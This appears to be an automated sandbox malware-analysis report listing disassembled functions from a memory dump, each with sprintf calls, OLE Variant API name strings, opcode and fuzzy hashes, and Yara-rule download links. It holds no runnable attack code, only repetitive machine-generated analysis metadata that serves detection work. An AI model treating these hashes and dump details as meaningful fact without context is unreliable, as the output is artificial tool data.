Instruction ID: 98644b5aef609819097ae690e3e5ffb9cfece6bbe4fe453e29130c2c03aba164
Opcode Fuzzy Hash: cfe88fcb8fde820df86bda1ae006257f190ea6c3bde1fe065974c0099122c13a
Instruction Fuzzy Hash: FAE086A6E0432617E601D654BC91AFB7798AFC1929F584DBEF58741100F76A920C8AF3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC1DF, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

SysAllocStringByteLen, xrefs: 02BCC1DF
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: SysAllocStringByteLen$ord%u
API String ID: 590974362-1107516498
Opcode ID: 6a0e683ea61dc28f34f106339a0f32c0846c888b8aa6cb8442de8ab0ef6a4185
Instruction ID: 27edee3065092c4b233e54816084adefe8b083f453d0be30e174b22f3d0b4657
Opcode Fuzzy Hash: 6a0e683ea61dc28f34f106339a0f32c0846c888b8aa6cb8442de8ab0ef6a4185
Instruction Fuzzy Hash: 8DE086A6E0432517E205D698BC51AFB77989F85525F4809BFF58341140E76AD21C8AB3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC1D0, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

SysStringByteLen, xrefs: 02BCC1D0
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: SysStringByteLen$ord%u
API String ID: 590974362-2321401113
Opcode ID: acb0d958a5e20981696f57ae360fe1ddd21780f4bb93dce2628d72693146b1ca
Instruction ID: b1892ce4dcbec309e97f8b6effebbf6f398a7e8dcd494e71f5d69882ef2f3d9c
Opcode Fuzzy Hash: acb0d958a5e20981696f57ae360fe1ddd21780f4bb93dce2628d72693146b1ca
Instruction Fuzzy Hash: A2E086A6E0431A27E201D654BC91AFF77C89F85525F480CBFF59781240E76AD20C8AB3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC1C1, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

SafeArrayPtrOfIndex, xrefs: 02BCC1C1
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: SafeArrayPtrOfIndex$ord%u
API String ID: 590974362-498447122
Opcode ID: e696509455dbe2af690352ff882baec93c0a7ac31908aae27deca5cf1113f6ba
Instruction ID: 6d50d6243f0703e5175564e1d291e0515c43e657f08d77e241eeef42d7710063
Opcode Fuzzy Hash: e696509455dbe2af690352ff882baec93c0a7ac31908aae27deca5cf1113f6ba
Instruction Fuzzy Hash: 82E086A6E0431657E201D694BC91AFB7798AFC1529F584DBEF58341140F76A920C8AF3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC13F, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarUI1FromBool, xrefs: 02BCC13F
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI1FromBool$ord%u
API String ID: 590974362-701289343
Opcode ID: eadd9167d7ccd1410be260a9990582925d8af0bf7f6d159f4e0ff1a1838adb53
Instruction ID: 5201a2db1123f22465c73bff1b48c5019bed8f2827f8aaabb807157786b91dd1
Opcode Fuzzy Hash: eadd9167d7ccd1410be260a9990582925d8af0bf7f6d159f4e0ff1a1838adb53
Instruction Fuzzy Hash: 8EE026A6E0431513E211D694BC51AFB77889F81428F4808BFF58340100E76BD20C8AB3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC130, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarUI1FromDisp, xrefs: 02BCC130
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI1FromDisp$ord%u
API String ID: 590974362-3701606508
Opcode ID: 57e8764efd3adb609c7fe55da9c8b0f16f054d30d1f70f1b05056f414782b6bd
Instruction ID: bff73d48477eb6c503b643f3119dc98edbdbb888bb73bbd8b5fab0089608c566
Opcode Fuzzy Hash: 57e8764efd3adb609c7fe55da9c8b0f16f054d30d1f70f1b05056f414782b6bd
Instruction Fuzzy Hash: 19E086A6E0431A27E201D654BC91AFB77CC9F85525F480CBFF59781101E76AD20C8AF3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC121, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarUI1FromStr, xrefs: 02BCC121

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI1FromStr$ord%u
API String ID: 590974362-1927974658
Opcode ID: 3018095bec1784f309ec674ae36674a113974c9786594c1c114517ed4e6cbab1
Instruction ID: c703e9c9d12acddefa9976eabd566149894415bd4bb8dbc52d8eb8929ad78b28
Opcode Fuzzy Hash: 3018095bec1784f309ec674ae36674a113974c9786594c1c114517ed4e6cbab1
Instruction Fuzzy Hash: 11E026B6E0432617E201C654BC81AFB7388AFC1524F4808BEF58240100F366920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC117, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarUI1FromDate, xrefs: 02BCC117
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI1FromDate$ord%u
API String ID: 590974362-1482231812
Opcode ID: c46c14893bb24989d633b9b4364b24e553545902ca1b4910df24822c4b77ebe3
Instruction ID: d6e4587ddca61978f06abe0d318ef4f3e91f863acad2f2e220641f0ca67f6605
Opcode Fuzzy Hash: c46c14893bb24989d633b9b4364b24e553545902ca1b4910df24822c4b77ebe3
Instruction Fuzzy Hash: DFE026A6E0431513E201D654BC91AFB73889F81424F4808BFF68340100E76BD20C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC108, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarUI1FromCy, xrefs: 02BCC108

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI1FromCy$ord%u
API String ID: 590974362-852187900
Opcode ID: ac133305ca7d42bb955f1aae18775a5799953f98e85358d30c8dd70ce3bb46a9
Instruction ID: d09caa1d8336a4db08e4c79655f465289f584b8df9d6996d5ea570a984e0d422
Opcode Fuzzy Hash: ac133305ca7d42bb955f1aae18775a5799953f98e85358d30c8dd70ce3bb46a9
Instruction Fuzzy Hash: 62E086AAE0432A27E201D654BC91AFB77C89F81525F4808BFF59781100E766D20C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC171, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarAnd, xrefs: 02BCC171

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarAnd$ord%u
API String ID: 590974362-2033127910
Opcode ID: 3ae2c2024555b98f8310e57903729c565e402e568f3a258b9b81780ef946ef31
Instruction ID: 44a95c00f61040d104de53be3390fd3c44ea363766302fdd269a13b9c2a8302b
Opcode Fuzzy Hash: 3ae2c2024555b98f8310e57903729c565e402e568f3a258b9b81780ef946ef31
Instruction Fuzzy Hash: 96E086A6E0435617E201D654BC91AFB77D8AFC5525F584DBEF58241100F76A920C8AF3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC167, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarAdd, xrefs: 02BCC167
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarAdd$ord%u
API String ID: 590974362-3907980590
Opcode ID: 3e65542672cbeb0775724f45f0569cb3f829c696ed08ac5ef95d83021cb5164c
Instruction ID: 726399647929dd735130a70ac40089af0e86a71b3c672ba65696fcb9a41a2662
Opcode Fuzzy Hash: 3e65542672cbeb0775724f45f0569cb3f829c696ed08ac5ef95d83021cb5164c
Instruction Fuzzy Hash: D7E086AAE0431517E205D694BC51AFB7798AF81529F480DBFF58341140E76AD21CCAA3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC158, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarTokenizeFormatString, xrefs: 02BCC158
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarTokenizeFormatString$ord%u
API String ID: 590974362-2453094628
Opcode ID: c162a783474b7e562746df81341b905a8d359010ba214459838b074b1beaf909
Instruction ID: 31158ca3b4ed990511e9afcc180b3fbbc11ee4f172d886e20f0e786f8eb296ec
Opcode Fuzzy Hash: c162a783474b7e562746df81341b905a8d359010ba214459838b074b1beaf909
Instruction Fuzzy Hash: 57E086A6E0435A27E201D654BC91AFB77C89F85525F480CBFF58381140E76AD20C8AB3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC149, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarFormatFromTokens, xrefs: 02BCC149
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarFormatFromTokens$ord%u
API String ID: 590974362-1477189024
Opcode ID: 5683310c67478f897bccb1807251c2325f2616795959c02bbfb76ba68887024d
Instruction ID: 96ee8031d0bac046cac2295218669933a3aa4398fe60d0bbb388c4590869b01c
Opcode Fuzzy Hash: 5683310c67478f897bccb1807251c2325f2616795959c02bbfb76ba68887024d
Instruction Fuzzy Hash: CBE086A6E0431617E201D654BC91AFB77D8AFC1525F584DBEF59641100F76AE20C8AF3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC6B7, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDecFromUI4, xrefs: 02BCC6B7
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecFromUI4$ord%u
API String ID: 590974362-2079967010
Opcode ID: 524308bff7415d7323ba1071008e099070adfba062fd7dec00d324d5a4f154ab
Instruction ID: 4776e4fa9d473f587b4b2e44d736757441dba543576ddc8ff0f7070736821a31
Opcode Fuzzy Hash: 524308bff7415d7323ba1071008e099070adfba062fd7dec00d324d5a4f154ab
Instruction Fuzzy Hash: FDE026A6E4431513E205D654BC51AFB7788AF82524F4808BFF98340100E76ED20C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC6A8, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDecFromUI2, xrefs: 02BCC6A8
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecFromUI2$ord%u
API String ID: 590974362-405402136
Opcode ID: 9ab6625ce8a8d383b0489a0d567ec5c5d71add747166550929a89086b2e6308e
Instruction ID: 4712f13ebd1fa50b1148098a3f0f68e12597655f312c3b00c432f26d3422be3e
Opcode Fuzzy Hash: 9ab6625ce8a8d383b0489a0d567ec5c5d71add747166550929a89086b2e6308e
Instruction Fuzzy Hash: 2EE086A6E4435A27E201D654BC91AFB77CCAF81525F4808BFF98381140E76AD20C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC699, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDecFromI1, xrefs: 02BCC699
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecFromI1$ord%u
API String ID: 590974362-2805027394
Opcode ID: ea3868742cc76f3503ea40d242d57c1769b11ca15715f5650c9077edaf56ad5f
Instruction ID: 5422c7953d01bc8c3bb1193802f6e7e39db79666f9aeef5291424cb385f216e5
Opcode Fuzzy Hash: ea3868742cc76f3503ea40d242d57c1769b11ca15715f5650c9077edaf56ad5f
Instruction Fuzzy Hash: 8AE086A6E0432617E601D654BC91AFF7798AFC1525F5849BEF59241100F7AAA20C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC68F, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarUI1FromDec, xrefs: 02BCC68F
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI1FromDec$ord%u
API String ID: 590974362-3421701749
Opcode ID: 88479ca829feeae3d5db07dcff116a8532f52814fa50453376e2fa1ffbcf2f08
Instruction ID: 3140410053746fefb1cc59741324ed0cbacc239c1f91075e8b9f55bfee463905
Opcode Fuzzy Hash: 88479ca829feeae3d5db07dcff116a8532f52814fa50453376e2fa1ffbcf2f08
Instruction Fuzzy Hash: 63E026A6E0431513E201D654BC51AFB73889F81424F4808BFF98340100E76ED20CC6A3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC680, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarUI1FromUI4, xrefs: 02BCC680

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
